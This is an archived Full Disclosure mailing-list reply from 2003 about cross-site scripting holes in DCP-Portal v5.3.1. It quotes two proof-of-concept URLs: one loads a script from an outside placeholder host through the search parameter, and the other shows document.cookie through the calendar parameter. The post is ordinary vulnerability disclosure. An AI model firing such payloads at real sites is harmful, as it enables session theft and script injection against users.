Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Some XSS vulns
From: mcbethh () op pl
Date: Wed, 19 Mar 2003 19:01:25 +0100

On Wed, 19 Mar 2003 01:59:35 +0200
Ertan Kurt <ertank () olympos org> wrote:

DCP-Portal v5.3.1
http://target/search.php?fields=content&q=<script%20src=http://othersite/code.js></script>
http://target/calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05
Vendor Site: http://www.dcp-portal.org

I've found many more vulnerabilities in dcp-portal... look at attached
advisory.


Regards
Grzegorz Aksamit

----------------------------------------------------------
 ( signature censored )
---------------------------------[ grzegorz aksamit ]-----

















Attachment: dcp-advisory-06-02-2003.txt
Description:


  By Date           By Thread  

Current thread:
  • Re: Some XSS vulns mcbethh (Mar 19)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault